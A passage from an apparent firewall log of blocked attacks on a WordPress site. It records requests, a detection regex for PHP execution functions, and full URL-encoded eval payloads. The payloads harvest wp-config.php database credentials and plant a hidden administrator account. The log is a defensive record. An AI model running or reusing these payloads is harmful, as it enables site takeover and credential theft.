20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/pomo\/mo.php HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\naccept:*\/*\nsec-ch-ua:\"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"\nupgrade-insecure-requests:1\nsec-ch-ua-mobile:?0\ncontent-length:12663\nsec-ch-ua-platform:\"macOS\"\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-encoding:gzip,deflate\nsec-fetch-site:none\nsec-fetch-user:?1\nsec-fetch-mode:navigate\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36\n\nHaFMzo=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 12:15:18","213.209.159.254","POST","\/wp-admin\/includes\/theme.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> RU:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-admin\/includes\/theme.php HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\nupgrade-insecure-requests:1\nsec-ch-ua-mobile:?0\ncontent-length:12640\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\ncookie:4=00cb3882c8d180ef2319e46eab0e93ae; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvHyHvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzSwL2IjqTIxVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nsec-fetch-mode:navigate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 